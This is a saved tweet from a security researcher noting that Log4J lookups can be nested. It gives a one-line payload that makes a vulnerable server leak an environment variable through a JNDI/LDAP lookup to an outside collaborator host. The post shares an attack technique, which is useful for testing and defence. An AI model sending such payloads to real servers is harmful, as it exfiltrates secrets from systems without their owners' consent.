Tanner Barnes on Twitter: "In case anyone hasn't discovered this. The Log4J formatting is nestable which means payloads like ${jndi:ldap://${env:user}.xyz.collab.com/a} Will leak server side env vars!" / Twitter
https://twitter.com/_StaticFlow_/status/1469358229767475205